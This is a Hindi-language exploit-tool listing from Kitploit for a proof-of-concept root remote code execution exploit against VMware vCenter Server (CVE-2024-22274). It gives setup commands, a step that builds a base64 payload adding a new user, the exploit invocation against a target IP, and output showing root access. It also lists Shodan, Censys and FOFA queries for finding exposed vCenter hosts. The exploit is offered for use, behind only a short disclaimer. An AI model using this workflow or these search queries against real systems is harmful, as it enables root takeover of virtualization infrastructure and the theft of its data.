Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-22274-RCE — PoC - VMware vCenter Server में प्रमाणित रिमोट कोड निष्पादन (Exploit) | Kitploit
उपकरण/GitHubGitHub/l0n3m4n/cve-2024-22274-rce
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubl0n3m4n/cve-2024-22274-rce

CVE-2024-22274-RCE

PoC - VMware vCenter Server में प्रमाणित रिमोट कोड निष्पादन (Exploit)

रिपॉजिटरी देखें
4562 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

विशेषाधिकार वृद्धि: VMware vCenter Server प्रमाणित RCE

Facebook X Medium Python Kali

📜 विवरण

“com.vmware.appliance.recovery.backup.job.create” और “com.vmware.appliance.recovery.backup.validate” API घटक एक फ़्लैग इंजेक्शन हमले के प्रति संवेदनशील हैं, जिसका उपयोग लक्षित सिस्टम पर रूट उपयोगकर्ता के रूप में मनमाने कमांड निष्पादित करने के लिए किया जा सकता है।

📚 विषय-सूची

  • 📜 विवरण
  • 🛠️ स्थापना
  • ⚙️ उपयोग
  • 🔎 खोज
  • 📝 नोट्स
  • 💁 संदर्भ
  • 📢 अस्वीकरण

🛠️ स्थापना और कॉन्फ़िगरेशन

[!NOTE] इस PoC एक्सप्लॉइट के साथ काम करने के लिए, आपके पास वैध क्रेडेंशियल होने चाहिए और SSH के माध्यम से VMware vCenter Server शेल में लॉग इन करना होगा। उपयोगकर्ता के पास "admin" भूमिका होनी चाहिए, जैसा कि vcenter_creds.txt फ़ाइल में निर्दिष्ट है।

root@kitploit:~
$ git clone https://github.com/l0n3m4n/CVE-2024-22274-RCE.git
$ cd CVE-2024-22274-RCE 
$ python3 -m venv venv && source venv/bin/activate
$ pip install -r requirements.txt 

user2base64.sh को चलाएँ या संशोधित करें ताकि जोड़े गए नए उपयोगकर्ता को base64 में एन्कोड किया जा सके और यह स्वचालित रूप से payload.txt बना देगा।

root@kitploit:~

$ bash user2base64.sh
Payload has been encoded to base64, saved payload.txt                                 

⚙️ उपयोग

VMware-vCenter

संवेदनशील संस्करण

vulnerable-version

सफल निष्पादन और शोषण

root@kitploit:~
$ python3 CVE-2024-22274-RCE.py -t 192.168.56.103 -P 22 -p payload.txt -c vCenter_creds.txt
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
                                                                              
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output: 
   uid=0(root) gid=0(root) groups=0(root)

[+] Exploitation successful: You have root access.
[+] Finished executing commands on 192.168.56.103

सफल निष्पादन लेकिन रूट एक्सेस नहीं

इस उदाहरण का मतलब है कि आप कनेक्ट हो रहे हैं लेकिन पेलोड सही ढंग से कॉन्फ़िगर या लोड नहीं किया गया है। अधिक विस्तृत जानकारी के लिए PDF PoC देखें।

root@kitploit:~
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
                                                                              
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output: 
   No privileges escalation detected.

[+] Exploitation failed: Root access not obtained.
[+] Finished executing commands on 192.168.56.103

कॉन्फ़िगरेशन फ़ाइल में उपयोगकर्ता नाम या पासवर्ड गायब है

root@kitploit:~
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
                                                                              
[-] Error: Username or password not found in configuration file.

कनेक्शन विफलता या SSH त्रुटि

कृपया होस्ट पता और क्रेडेंशियल जांचें।

root@kitploit:~
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
                                                                              
[-] Error: [SSH Error] Connection to 192.168.56.103 failed.

🔎 खोज

  • CENSYS: "VMware vCenter", फ़िल्टर: services.port: 443 AND tags: "VMware"
  • FOFA: title="VMware vCenter", फ़िल्टर: port="443" && title="VMware vCenter"
  • SHODAN: "VMware vCenter", फ़िल्टर: port:443 "VMware vCenter"

📝 नोट्स

यह एक्सप्लॉइट PoC तब तक प्रभावी नहीं होगा जब तक आप समझ नहीं पाते कि स्क्रिप्ट की व्याख्या कैसे करें, क्योंकि इसे जानबूझकर बदला गया है ताकि "स्क्रिप्ट किडीज़" इसे केवल कॉपी करके बिना समझे नहीं चला सकें। VMware vCenter Server वर्चुअलाइज़्ड वातावरण के प्रबंधन में एक महत्वपूर्ण घटक है, यदि कोई इस तक पहुँच प्राप्त कर लेता है तो वह वर्चुअल इंफ्रास्ट्रक्चर पर पूर्ण नियंत्रण पा सकता है और संवेदनशील डेटा बाहर भेज सकता है। यह PoC उन लोगों के लिए डिज़ाइन किया गया है जिनके पास पहले से थोड़ी तकनीकी विशेषज्ञता है, ताकि वे इसका सही उपयोग कर सकें। इसलिए यदि आप स्क्रिप्ट किडी हैं जो बिना प्रभाव समझे नुकसान पहुँचाना चाहते हैं, तो यह एक्सप्लॉइट आपके लिए उपयोगी नहीं होगा।

💁 संदर्भ

  • http://www.vmware.com/security/advisories
  • https://nvd.nist.gov/vuln/detail/CVE-2024-22274
  • https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202405-4049
  • https://bdu.fstec.ru/vul/2024-05108
  • https://github.com/advisories/GHSA-xm44-79f8-q8r7

📢 अस्वीकरण

यह टूल केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान किया गया है। निर्माता टूल के किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है। समस्या बनाएँ

टूल डाउनलोड करें